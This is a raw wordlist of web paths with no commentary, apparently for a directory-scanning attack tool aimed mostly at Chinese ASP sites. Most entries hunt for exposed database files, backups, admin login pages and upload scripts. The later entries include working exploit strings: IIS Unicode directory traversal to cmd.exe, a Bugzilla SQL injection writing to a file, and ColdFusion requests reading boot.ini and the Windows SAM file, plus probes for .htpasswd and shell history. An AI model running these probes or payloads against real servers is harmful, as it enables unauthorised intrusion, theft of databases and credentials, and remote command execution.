/Database/SuperFTP.Cn.mdb
/DataBase/TCBBS7.asp
/database/uming_gb20120.mdb
/Database/vote.mdb
/Databases/%235454t5y67ur.mdb
/Databases/21asp.mdb
/Databases/myszw.mdb
/db.bak
/db.mdb
/db.rar
/db.zip
/db/6k.asp
/db/bbs.asa
/db/play.asp
/db/xzjddown.mdb
/down2003.asp
/download.mdb
/dxxobbs/mdb/dxxobbs.mdb
/firend.mdb
/FooSun_Data/FooSun_Data.mdb
/Foosun_Data/FS400.mdb
/home/database/new.mdb
/inc/base.asp
/inc/base.mdb
/inc/bbs.asp
/inc/bbs.mdb
/inc/conn.asp
/inc/conn.inc
/inc/connection.asp
/inc/data.mdb
/inc/database.mdb
/KS_Data/KesionCMS4.mdb
/liuyan/25175guestbook.mdb
/liuyan/BOOK.MDB
/liuyan/database/uming_gb20120.mdb
/managenews/data/xunt.mdb
/mdb/mdb.asp
/MirCMS_ADB.mdb
/mirserver.rar
/movie.mdb
/msmir/msmir.mdb
/msmir_net.mdb
/mydata.asp
/mydata.mdb
/nbinfomusic.asp
/news/wenzhang.mdb
/PowerEasy2006.mdb
/shop.mdb
/shujuku/movie.mdb
/smss.mdb
/sql.rar
/webdata.asp
/webdata.mdb
/wenzhang.mdb
/wolserver.rar
/xxyf5324.mdb
/z_shop_newshop.asp
/zt/ztpdata.mdb
/ztqdata.mdb
data/%23bjxshop.mdb
/admin/uploadPic.asp
/adminn/upLoad_bm1.asp
/adminn/upLoad_c1.asp
/ads/ad.asp
/ads/upfile.asp
/bbs/post_upfile1.asp
/bbs/post_upload1.asp
/bbs/reg_upload1.asp
/bbs/saveup1.asp
/bbs/upfile1.asp
/bbs/z_visual_upfile.asp
/cx/upfile.asp
/dvbbs/post_upfile1.asp
/dvbbs/post_upload1.asp
/dvbbs/reg_upload1.asp
/dvbbs/saveup1.asp
/dvbbs/upfile1.asp
/editor/upload.asp
/eWebEditor/upload.asp
/mybbs/saveup.asp
/p/upfile.asp
/phpinfo
/saveup1.asp
/UP/UpFilea.asp
/upflash.asp
/upimage.asp
/upload_file.asp
/upload_image.asp
/upsoft.asp
/z_visual_upfile.asp
/.idq
/05
/1
/2004
/2005
/3
/4
/5
/6
/7
/8
/9
/abroad
/ad/img
/address
/admin/default/
/admin/edit/db/
/admin/editor/db/
/admin/ewebeditor/db/
/admin/index/
/admin/login/
/admin/manage/
/admin/webedit//db/
/admin/webeditor//db/
/adsl
/adver
/aggress
/algol/archive
/and
/angel
/archiv
/are
/art/
/article/admin/
/Article/Class
/article/info
/Article/news
/article/show
/Article/Sort
/article/user
/Article_Show
/asmvirus
/astro
/baidu
/bbs/board
/bbs/cgi-bin
/bbs/upfiles
/biz
/blog/include
/Board
/bobo
/booklist
/boy
/bt/soft
/bulo
/car
/chat
/china
/city
/class/hacker
/classad
/club
/cnfoods
/column/wuxia
/comic
/computer
/const
/control
/cool
/corp
/cracker
/css
/culture
/data_bak/
/delphi
/dguide
/dianying
/discuz
/display
/diwanchn
/diy
/donghua
/down/movie
/down/mtv
/down/music
/down/show
/down/Software
/down/song
/down/sort
/download/show
/downweb
/eat
/edit/db/
/editor/db/
/education
/eladies
/ent
/error
/Etimes
/event.ng
/ewebeditor/db/
/exit/
/feature
/film/soft
/filmdetail
/flash
/free/Music
/fund
/golf
/gongju
/google
/gov
/guest
/hacker/aggress
/Hackersafe
/health
/heike
/hexian
/homepage
/house
/idea//
/ideas
/includeinc/
/index/admin
/index/article
/index/down
/index/info
/index/Soft
/infoview
/install
/ip
/java
/jh
/jianghu
/jiaoyou
/job
/Js
/kdown
/lady
/leadbbs
/Legman
/leobbs
/level
/life
/Listing
/love
/mall
/map
/market
/media
/message
/microsoft
/mir
/mm
/mobile
/mp3
/mrtg/
/mtv
/musiclist
/myfiles
/myweb
/name
/napoor
/net/classhtml
/new/display
/new_web
/newbook
/newdown
/online
/pages
/party
/personal
/popme
/print
/qq/article
/rank
/read
/right
/rookie
/ruanjian
/safe
/school
/search
/send
/server-info/
/server-status/
/shop
/show
/sina
/sms
/snmp/
/Soft/book
/Soft/Cartoon/Other
/Soft/class2
/Soft/hack
/Soft_Class
/soft2
/SoftChannel
/softdown
/SoftView
/SoftWare
/sohu
/song
/Sorting
/soufun
/Special
/sports
/static
/stock/company
/Study
/styles
/sub
/sun
/superadmin/
/technology
/temporary/
/thbbs
/tj
/tool/
/tools/
/travel
/txt
/type
/up_img/
/up_imgs/
/upfile
/UpImages
/upimg/
/upload_image/
/upload_images/
/vbb
/vies
/vip
/wap
/war
/weather
/webedit/db/
/webstats
/wenxue
/woman
/wuxia
/wwwstats/
/xbbs
/xiazai
/xml
/yinyue
/youxi
/新建文件夹/
/add_admin.
/add_user.
/adm_user.asp
/admin/edit/admin_login.
/admin/editor/admin_login.
/admin/ewebeditor/admin_login.
/admin/get_your_passport.aspx
/admin/webedit/admin_login
/admin/webeditor/admin_login
/admin_go.asp
/admin_m/login.aspx
/admin_php.asp
/admin3.asp
/admin4.asp
/admin666.asp
/admin999.asp
/AdminCenter/AdminLogin.aspx
/admincp.asp
/Administration/Default.aspx
/adminjoin.asp
/adminruan/index.aspx
/adoconn
/amd/index
/amd/login
/amd/super
/amd_007/admin
/amd_007/index
/amd_007/login
/amd_007/super
/art.
/article.
/base64
/bbs/login
/cgi_bin/11111/index.asp
/cgi_bin/88888/index.asp
/cgi_bin/a_main.asp
/cgi_bin/ad.asp
/cgi_bin/ad_admin/admin_login.asp
/cgi_bin/ad_login.asp
/cgi_bin/ad_manage.asp
/cgi_bin/addlb.asp
/cgi_bin/addmember.asp
/cgi_bin/adduser.asp
/cgi_bin/adm_login.asp
/cgi_bin/admin.asp
/cgi_bin/admin/adm_menu.asp
/cgi_bin/admin/admin_6list.asp
/cgi_bin/admin/Admin_Login.asp
/cgi_bin/admin/default.asp
/cgi_bin/admin/index.asp
/cgi_bin/admin/login.asp
/cgi_bin/admin/manage.asp
/cgi_bin/admin/news.asp
/cgi_bin/admin/Select_feedback.asp
/cgi_bin/admin_admin.asp
/cgi_bin/Admin_BatchLink.asp
/cgi_bin/admin_del.asp
/cgi_bin/admin_delete.asp
/cgi_bin/admin_edit.asp
/cgi_bin/admin_index.asp
/cgi_bin/admin_login.asp
/cgi_bin/admin_main.asp
/cgi_bin/Admin_SoftInfo.asp
/cgi_bin/admin_user.asp
/cgi_bin/admin1.asp
/cgi_bin/admin888.asp
/cgi_bin/adminadduser.asp
/cgi_bin/adminadmin
/cgi_bin/admindel.asp
/cgi_bin/admindelete.asp
/cgi_bin/adminedit.asp
/cgi_bin/adminindex
/cgi_bin/administrator
/cgi_bin/adminlogin.asp
/cgi_bin/adminmember.asp
/cgi_bin/admintab.asp
/cgi_bin/adminuser.asp
/cgi_bin/adminuserlogin.asp
/cgi_bin/adsystem/index.asp
/cgi_bin/asp/admin/login.asp
/cgi_bin/back/login.asp
/cgi_bin/chkadmin.asp
/cgi_bin/chklogin.asp
/cgi_bin/college/index.asp
/cgi_bin/Console/login/
/cgi_bin/denglu.asp
/cgi_bin/eadmin/login.asp
/cgi_bin/editmember.asp
/cgi_bin/edituser.asp
/cgi_bin/gb/register.asp
/cgi_bin/guanli.asp
/cgi_bin/guanli-cn.asp
/cgi_bin/guestbook/man.asp
/cgi_bin/houtai.asp
/cgi_bin/houtaiguanli.asp
/cgi_bin/ht/
/cgi_bin/htgl.asp
/cgi_bin/index_admin.asp
/cgi_bin/index_manage.asp
/cgi_bin/indexadmin
/cgi_bin/inside/
/cgi_bin/login.asp
/cgi_bin/login/login.asp
/cgi_bin/login_admin.asp
/cgi_bin/login_out.asp
/cgi_bin/logout.asp
/cgi_bin/main.asp
/cgi_bin/manage.asp
/cgi_bin/manage/login.asp
/cgi_bin/manage_index.asp
/cgi_bin/manager.asp
/cgi_bin/manager/left.asp
/cgi_bin/member.asp
/cgi_bin/members.asp
/cgi_bin/new/admin_index.asp
/cgi_bin/office/login.asp
/cgi_bin/Product/manage/login.asp
/cgi_bin/register.asp
/cgi_bin/show/back/index.asp
/cgi_bin/sys.asp
/cgi_bin/sys/login.asp
/cgi_bin/sys/login/
/cgi_bin/system/login.asp
/cgi_bin/system/login/
/cgi_bin/systems/login.asp
/cgi_bin/systems/login/
/cgi_bin/trade/admin/Login.asp
/cgi_bin/user.asp
/cgi_bin/users.asp
/cgi_bin/webadmin/
/cgi_bin/weihu/login.asp
/cgi_bin/xtadmin/
/checkadmin.asp
/cipher.
/common.
/common/md5
/connstr
/consts
/count
/count/supervise/Login
/crypto
/databases
/db
/db_con
/dbase
/dbconn
/decrypt
/default_admin
/default_login
/del
/del_admin
/delete
/devel
/EC_Admin/EC_AdminLogin.asp
/edit/admin_login
/EduAdmin/Admin_Login.aspx
/emyuser_login
/encrypt
/eWeb/admin_login
/exit
/findaccount
/frame
/freeweb_admin
/girls.
/hiadmin/
/HomeManagement/Login.aspx
/Hradmin/admin
/idea
/inc/md5
/include/md5
/includeinc
/incoming
/left
/link_admin
/login/logout
/login_user.asp
/loginsave
/loginsuper
/mainframe
/Manage/Default.aspx 
/Manager/default.aspx
/md5
/mem/login
/mrtg
/msm/login.asp
/myalibabainfo/Login.asp
/ok_pass
/post_upfile
/post_upload
/programming
/reg_upload.
/reg_upload1
/sd_login.asp
/SearchManage
/server-info
/server-status
/setting
/sever
/siyu/manage/admin_login.asp
/snmp
/sources
/super_index.asp
/super_login.asp
/super1
/superman.asp
/superuser.asp
/supervise/Login
/sxang_Manage/login.asp
/system/default.html
/temp_admin
/temporary
/tool
/tools
/update_user
/usage
/user/admin
/user/index
/user/login
/user/logout
/user/super
/user1.asp
/user2.asp
/user3.asp
/user888.asp
/UserJoin.asp
/userlist
/userlook
/UserManage.asp
/UserModify.asp
/USERok
/userslist
/wantpws
/webedit/admin_login
/weblog
/weblogs
/WebSiteAdminister
/wocaonima
/wwwlog
/xbyadmin/
/xgjy_admin/admin_login.aspx
/xuegongjin.asp
/cgi_bin/11111/index.aspx
/cgi_bin/88888/index.aspx
/cgi_bin/a_main.aspx
/cgi_bin/ad.aspx
/cgi_bin/ad_admin/admin_login.aspx
/cgi_bin/ad_login.aspx
/cgi_bin/ad_manage.aspx
/cgi_bin/addlb.aspx
/cgi_bin/addmember.aspx
/cgi_bin/adduser.aspx
/cgi_bin/adm_login.aspx
/cgi_bin/admin.aspx
/cgi_bin/admin/adm_menu.aspx
/cgi_bin/admin/admin_6list.aspx
/cgi_bin/admin/Admin_Login.aspx
/cgi_bin/admin/default.aspx
/cgi_bin/admin/index.aspx
/cgi_bin/admin/login.aspx
/cgi_bin/admin/manage.aspx
/cgi_bin/admin/news.aspx
/cgi_bin/admin/Select_feedback.aspx
/cgi_bin/admin_admin.aspx
/cgi_bin/Admin_BatchLink.aspx
/cgi_bin/admin_del.aspx
/cgi_bin/admin_delete.aspx
/cgi_bin/admin_edit.aspx
/cgi_bin/admin_index.aspx
/cgi_bin/admin_login.aspx
/cgi_bin/admin_main.aspx
/cgi_bin/Admin_SoftInfo.aspx
/cgi_bin/admin1.aspx
/cgi_bin/admin888.aspx
/cgi_bin/admindel.aspx
/cgi_bin/admindelete.aspx
/cgi_bin/adminedit.aspx
/cgi_bin/adminlogin.aspx
/cgi_bin/adminmember.aspx
/cgi_bin/admintab.aspx
/cgi_bin/adminuser.aspx
/cgi_bin/adminuserlogin.aspx
/cgi_bin/adsystem/index.aspx
/cgi_bin/asp/admin/login.aspx
/cgi_bin/back/login.aspx
/cgi_bin/chkadmin.aspx
/cgi_bin/chklogin.aspx
/cgi_bin/college/index.aspx
/cgi_bin/denglu.aspx
/cgi_bin/eadmin/login.aspx
/cgi_bin/editmember.aspx
/cgi_bin/edituser.aspx
/cgi_bin/gb/register.aspx
/cgi_bin/guanli.aspx
/cgi_bin/guanli-cn.aspx
/cgi_bin/guestbook/man.aspx
/cgi_bin/houtai.aspx
/cgi_bin/houtaiguanli.aspx
/cgi_bin/htgl.aspx
/cgi_bin/index_admin.aspx
/cgi_bin/index_manage.aspx
/cgi_bin/login.aspx
/cgi_bin/login/login.aspx
/cgi_bin/login_admin.aspx
/cgi_bin/login_out.aspx
/cgi_bin/logout.aspx
/cgi_bin/main.aspx
/cgi_bin/manage.aspx
/cgi_bin/manage/login.aspx
/cgi_bin/manage_index.aspx
/cgi_bin/manager.aspx
/cgi_bin/manager/left.aspx
/cgi_bin/member.aspx
/cgi_bin/members.aspx
/cgi_bin/new/admin_index.aspx
/cgi_bin/office/login.aspx
/cgi_bin/Product/manage/login.aspx
/cgi_bin/register.aspx
/cgi_bin/show/back/index.aspx
/cgi_bin/sys.aspx
/cgi_bin/sys/login.aspx
/cgi_bin/system/login.aspx
/cgi_bin/systems/login.aspx
/cgi_bin/trade/admin/Login.aspx
/cgi_bin/user.aspx
/cgi_bin/users.aspx
/cgi_bin/weihu/login.aspx
/admin/ewebeditor/admin/
/admin/ewebeditor
/admin/ewebeditor/db
/datas/web300.mdb
/databases/web300.mdb
/ewebeditor1
/Database/xxcms.mdb
//bianjiqi
/data-base
/dat
/sjk
/sj
/shuju
/../admin/login/
/login/login/
/login/index/
/login/super/
/newbbs/login/
/down/login/
/bbs/admin/login/
/main/login/
/../admin/
/manager/login/
/zyadmin/login.asp
/eye2007/Admin/Admin_login.asp
/info/admin/m_login.asp
/info/zcfg/login.asp
/script/Product/MANAGE/login.asp
/bbsxp/Login.asp
/Admin_Cy/Zzm.asp 
/2005kycj/2005kycj/login.asp
/zkcf45/login.asp
/manager/1ndex.asp
/administrator/Shop_Login.htm
/cn/admin/login/login.asp
/administrator/manage.asp
/asp-bin/manage
/admin_jy1001/login.asp
/admin_login/admin/admin
/Super/Index.asp
/localhost/admin/login.asp
/gl/login.asp
/webmaster/login.asp
/adminqiqi/Login.asp
/news/admin_index.asp
/cnzz/Login.asp
/manage/admin/admin
/ManageAdmin/ManageLogin.asp
/WebAdmin/login.asp
/WebAdmin/eWebEditor/Admin_Login.asp
/localhost/manage/index.asp
/admin/cz_login.asp
/eneya/eneya888/
/asp/index.htm
/smhththt/manage.asp
/cx/login.asp
/Article/admin/login.asp
/admin/login.htm
/xxms/admin/login.asp
/manage/LogOn.asp
/job/admin/
/admin_999/login/login.asp
/down/admin/login.asp
/bbs/Admin/Login.Asp
/admin/logina.asp
/admin/login1.asp
/admin/admin_admin.asp
/ewebedit/db/
/robot.txt
/data/123.asp
/Southidceditor/upload.asp
/admin/Southidceditor/upload.asp
/admin/htmedit/db/%23ewebeditor.mdb
/htmedit/db/%23ewebedtor.mdb
/htmedit/db/ewebeditor.asp
/admin/htmedit/db/ewebeditor.asp
/admin/ewebedit/admin_login.asp
/inc/eWebEditor/upload.asp
/inc/Editor/upload.asp
/inc/Edit/upload.asp
/inc/WebEditor/upload.asp
/inc/htmlEdit/upload.asp
/ewebeditor/db/edit.mdb
/admin/logo.asp
/editor/admin_style.asp
/admin/editor/admin_style.asp
/edit/db/%23edit.mdb
/adminmain/upload.asp
/master/
/master/ewebeditor/upload.asp
/admin/asp.asp
/admin/db.asp
/inc/sqlin.asp
/in_admin.asp
/sql/in_admin.asp
/wish/in_admin.asp
/admin/web/
/admin/dbb.asp
/admin/inc_config.asp
/shop/admin/b2b_sysdata.asp
/admin/b2b_sysdata.asp
/inc/webconfig.asp
/ew/upload.asp
/admin/ew/upload.asp
/SqlIn.mdb
/adminman/
/config/setup.asp
/e/admin/
/user/User_GetPassword.asp
/db1.mdb
/DataBase/%23GBooK.ASP
/include/%23%21news.aea
/master/login.asp
/%23sql.asa
/sql.asa
/manger/
/Include/setting.asp
/link/link.asa
/links/links.asa
/link/link.asp
/links/links.asp
/guan%5Fli
/admin/adminconn.inc
/manger/index.htm
/manage/index.htm
/administration/login_form_admin.htm
/admin/index.htm
/lzwadmin/admlogin.htm
/CmsEditor/Upload.asp
/FTB/ImageGallery.aspx?rif=/&cif=../&ftb=reProduct_content2
/admin/FCKeditor/
/tryread/forbook1.asp
/1/
/3/
/Login/Admin/
/Logon/
/Trade/Admin/
/a/
/b/
/d/
/info/
/suzhijy/htdocs/db/fileupimg2.asp
/register/userreg_setp2.asp
/download/upfile.asp
/manage/spzs/zs_save_add.asp
/blogdata/acblog.asa
/user/upfile.asp
/user/uploadpic.asp
/htmledit/upload.asp
/webeditor/upload.asp
/user/uploadphoto.asp
/manage/sub_upload.asp
/..index/
/..default/
/..manage/
/..login/
/default/admin.asp
/default/login.asp
/cnlogin/login.asp
/admin_loginadmin
/ewebedit/db/ewebeditor1013.asp
/SEM_User/admin_php/login.asp
/db/6k.asp 6kbbs
/vote/dsvote%23.asa
/link/links%23.asa
/blogdata/1-blog.mdb
/database/leadbbs.mdb
/data/snowboy.mdb
/database/yiuwekdsodksldfslwifds.mdb
/database/article.asp
/db/com02.mdb
/User/UserReg.asp
/appoen.mdb
/appoen.asp
/appoen.asa
/BarkBaseData.mdb
/bbsxp.asp
/bbsxp.asa
/bbsxp.mdb
/bbsxp7.mdb
/bbsxp7.asp
/bbsxp7.asa
/dlog_db.mdb
/dlog_db.asa
/dlog_db.asp
/database.asa
/database02.mdb
/db.asa
/db1.asp
/db1.asa
/down.mdb
/down.asa
/download.asa
/dvbbs.mdb
/dvbbs.asp
/dvbbs5.mdb
/dvbbs5.asp
/dvbbs5.asa
/dvbbs6.mdb
/dvbbs6.asp
/dvbbs6.asa
/dvbbs7.mdb
/dvbbs7.asp
/dvbbs7.asa
/friend.mdb
/jokeoe_data.asp
/jokeoe_data.asa
/jokeoe_data.mdb
/l-blog.mdb
/l-blog.asp
/l-blog.asa
/leadbbs.mdb
/leadbbs.asp
/leadbbs.asa
/mdb.asa
/mdb.mdb
/NBArticle.asp
/NBArticle.asa
/nbarticle.mdb
/new.mdb
/new.asa
/news3000.mdb
/news3000.asa
/oblog31.asp
/oblog31.asa
/oblog31.mdb
/powereasy4.mdb
/powereasy4.asp
/powereasy4.asa
/qcdn_news.mdb
/qcdn_news.asp
/qcdn_news.asa
/sf2.mdb
/sf2.asp
/sf2.asa
/tjstat.asp
/tjstat.mdb
/tjstat.asa
/usre.asa
/usre.mdb
/ydxzdate.mdb
/ydxzdate.asp
/zm_marry.asa
/zm_marry.mdb
/bbsxp6.mdb
/bbs/DataBase/bbsxp6.mdb
/bbsxp/DataBase/bbsxp.mdb
/bbsxp/DataBase/bbsxp6.mdb
/dvbbs/data/dvbbs6.mdb
/dvbbs/data/dvbbs7.mdb
/bbs/DataBackup/dvbbs6.mdb
/dvbbs/DataBackup/dvbbs7.mdb
/dvbbs/DataBackup/dvbbs6.mdb
/database/adffjhfgdfghsdfgsdfghjf.mdb
/database/tiyisw.asp
/bbsxp/upfile.asp
/admin/UploadImage3_upload.asp
/whj/vot/DataBase/DB.mdb
/DataBase/BBSXP7.mdb
/Database/mjaqibmugg@1hy9f.mdb
/Data/%23%23DatalaoY2.3.mdb
/_database/e3b3ee1b5da271ai.mdb
/Database/tyqiye.mdb
/Admin_Cy/DataBackup/DataBack.asa
/Admin_Cy/DataCy/%23%23cyweb_cn.asp
/Database/Ameav_Site.mdb
/DataBase/DB.asa
/DataBase/DB.mdb
/date/tksoft.mdb
/date/Idea_Site.mdb
/%23data%23/!@%23$%^&data&~.asp
/data/%23liaoxd.asp
/%23db.mdb
/database/)%&!%^!%23!(@&.mdb
/Database/%23TZIMS_Ver6.1.mdb
/data/%23sze7xiaohu.mdb
/data/%23actee1data.mdb
/data/data%23bird$.mdb
/Data.project/%23zxData.project%23.asp
/Data.project/%23zxData.project%23.mdb
/Data/Fl_Web.mdb
/Databases/%23Database.mdb
/ggjdsd/Hz@host!.asp 
/db/%23ruiutend&anxiu.mdb
/product/ADMIN/MDB/lennyash.asp
/Database/DataShop.mdb
/Database/roha.mdb
/database/Enterprises .mdb
/Admin/Database/%23tourdata.asp
/Admin/Database/%23tourdatabak.asp
/Databases/asp99cms.mdb
/data/%23db.mdb
/admin/Databases/male520backup.mdb
/manage/Databackup/DataShop.mdb
/db/%23hospital.mdb
/db/bak%23hospital.mdb
/Data/MeCMS_data.asp
/data/%23$%23%%23%$%23%$%23mnlssystemdali%23$$%23%23%23$%23.mdb
/cnkdata/cnkcms2008.mdb
/DATA/%23echuang%23.asp
/database/zzchn%23da2005.asp
/database/data_w%23eb_site_2007.mdb
/Databases/bonfurniture.mdb
/AccessDB/d0w2b8d3.mdb
/inc/db/%23db0D97.Mdb
/database/heiren.asp
/database/ice%23.mdb
/data/TUNGSTENDATA.asp
/HxData/%23HxData.mdb
/Database/%23database%23.asp
/Database/%23$% ^NwebCn_Site.mdb
/mydatazw/%23mydatazw.mdb
/sjk2008/115cn.asp
/sjk2008/%23sy%23wgh2008%23.asp
/Skyj.mdb
/HN_news.mdb
/data/%23data.mdb
/cpgl/deta/cpgl.mdb
/cpgl/deta/zaopin.mdb
/Databases/0791idc0.mdb
/Data/%23@data.mdb
/Database/DataShop).asp
/Database/DataShop.asp
/db/%23fgfdszfasad%23.mdb
/Database/DataShop1.mdb
/data/%23fdaeg35@%23gds.asp
/Database/%23tyqiye.asp
/Database/%23tyqiyechina.asp
/mdb/ejiadesign.mdb
/database/Enterprise.mdb
/db/%23ewebeditor.asa
/db/%23ewebeditor.asp
/xzdata/bbkwen_xz.mdb
/Data/WRMPS.mdb
/tot_dabase/%23tot_news.asp
/db/db.mdb
/data/%23123zh.mdb
/KS_Data/KesionCMS5.mdb
/data/%23886n.mdb
/Database/%23wygkcnalibaba.asp
/data/%23WRGKCNSMSJ.asp
/data/1.mdb
/Data/wrtxcnshop2.asa
/data/%23fdkjgzcomshop.mdb
/DataBase/%23SoYiCi.MDB
/db/data.mdb
/Databases/wrtxcnqywz4.asp
/Databases/wygkcnqyhtml.asp
/Databases/%23wygkcnqywz4.asp
/Databases/wygkcnqywz3.asp
/Databases/wygkcnqywz.asp
/HXMYDATABASE/%23WY_OAdata2010.MDB
/Data/glgk2007.mdb
/Dataabc/Data%23userabc.mdb
/Database/caifuw.mdb
/database/SiteWeaver6.5.mdb
/database/SiteWeaver.mdb
/admin/maillist.mdb
/data\%23data%23.mdb
/Databackup\bak.mdb
/Database\vote.mdb
/DB_UserData
/DvForum
/cnhww.mdb
/blogDB
/data/blog.mdb
/blogDB/PBlog2.asp
/blogDB/PBlog1.asp
/data/oask.asp
/databases/shop22%23cndata.mdb
/mdb\mydatabase.mdb
/Database/Data.asa
/Database/Data.asp
/iwms.mdb
/database\PowerEasy4.mdb
/%23data.mdb
/%23data.asp
/admin/data/news30000.mdb
/dxy/dxy.mdb
/data/lbbs%23DfLLds.asp
/bbs-data/2005&%%23sjk.asa
/DataBases/%23%23%23fdkjgzschool.V2009%23.asp
/data/mingren.asa
/%23dat%23!@$a.asp
/job.mdb
/../admin/shopbackup.mdb
/admin/shopbackup.mdb
/manage/Database/DataShop.mdb
/Data/oblog4.60.mdb
/data/news30000.mdb
/editor/db/ewebeditor1013.mdb
/edit/db/ewebeditor1013.mdb
/ewebeditor/db/ewebeditor1013.mdb
/webedit/db/ewebeditor1013.mdb
/htmledit/db/ewebeditor1013.mdb
/htmledit/admin_login.asp
/htmledit/db/ewebeditor.mdb
/webedit/db/%23ewebeditor.mdb
/webedit/db/ewebeditor.asp
/htmledit/db/%23ewebeditor.mdb
/htmledit/db/ewebeditor.asp
eWebEditor/db/ewebeditor.mdb
/ewebeditor/db/%23ewebeditor.mdb
/admin/ewebeditor/db/%23ewebeditor.mdb
/edit/db/%23ewebeditor.mdb
/editor/db/%23ewebeditor.mdb
/ewebedit/db/ewebeditor.asp
/ewebedit/db/%23ewebeditor.mdb
/ewebedit/db/ewebeditor1013.mdb
/ewebedit/db/&23ewebeditor1013.mdb
/ewebedit/db/&23ewebeditor.asp
/SouthidcEditor/datas/SouthidcEditor.mdb
/admin/Southidceditor/datas/SouthidcEditor.mdb
/admin/ewebeditor/db/ewebeditor1013.mdb
/admin/edit/db/ewebeditor1013.mdb
/admin/editor/db/ewebeditor1013.mdb

/%3f.jsp
/*.ida
/*.idc
/*.idq
/+
/../web-inf
/./admin/
/./web-inf/
/.access
/.bash_history
/.htaccess
/.htpasswd
/.jsp/web-inf/classes/env.java
/.members
/.nsf
/.pass
/.passwd
/.password
/.passwords
/.passwrd
/.pl
/.printer
/.pwd
/.sh_history
/.userid.pwd
/.users
/.usersdb
/.wwwacl
/abczxv.htw
/accept
/accept/
/access
/access.log
/access.txt
/accounting
/active.log
/admin.asp.bak
/admin.cfg
/admin.cgi
/admin.data
/admin.db
/admin.dbf
/admin.exe
/admin.htx
/admin.ini
/admin.lst
/admin.php3
/admin.php3?admin=anything
/admin.pl
/admin.shtml
/admin.txt
/admin/admin_login.asp.bak
/admin/admin_login.asp.bk
/admin/admin_login.jsp
/admin/admin_login.jsp.bak
/admin/admin_login.jsp.bk
/admin/admin_login.php.bak
/admin/admin_login.php.bk
/admin/admin_login.pl
/admin/admin_login.pl.bak
/admin/admin_login.pl.bk
/admin/login.asp.bak
/admin/login.asp.bk
/admin/login.jsp
/admin/login.jsp.bak
/admin/login.jsp.bk
/admin/login.php.bak
/admin/login.php.bk
/admin/login.pl
/admin/login.pl.bak
/admin/login.pl.bk
/admin4.nsf
/admin_admin.asp.bak
/admin_chklogin.asp
/admin_chklogin.asp.bak
/admin_index.asp.bak
/admin_login.asp.bak
/admin_login.asp.bk
/admin_login.jsp.bak
/admin_login.jsp.bk
/admin_login.php.bak
/admin_login.php.bk
/admin_login.pl
/admin_login.pl.bak
/admin_login.pl.bk
/admin_main.asp.bak
/admin_menu.asp
/admin_menu.asp.bak
/apache
/apexec.cgi
/apexec.pl
/aux.jsp
/bank
/bbs/admin
/bbs/admin/
/bbs/admin/config
/bbs/admin/config/
/bbs/data/
/bbs/db
/bbs/db/
/bbs/include
/bbs/include/
/bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
/bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
/bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl
/bin/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir
/bin/scripts/openvendor/gnete/retrievepnbody.asp
/book/inc/conn.asp
/book/inc/conn.asp.bak
/bugzilla/long_list.cgi?buglist=1%20into%20outfile%20%27/tmp/pussycat%27
/bugzilla/reports.cgi
/bugzilla/userprefs.cgi
/c/admin.dll
/c/cmd.exe?/c+dir
/c/root.exe?/c+dir
/c:/
/cache-stats
/cache-stats/
/card
/card/
/catalog.nsf
/catalog.nsf/
/ccc.exe?/c+dir
/cfdocs/
/cfdocs/cfcache.map
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/examples/
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/exprcalc.cfm?openfilepath=c:\winnt\repair\sam._
/cfdocs/expeval/openfile.cfm
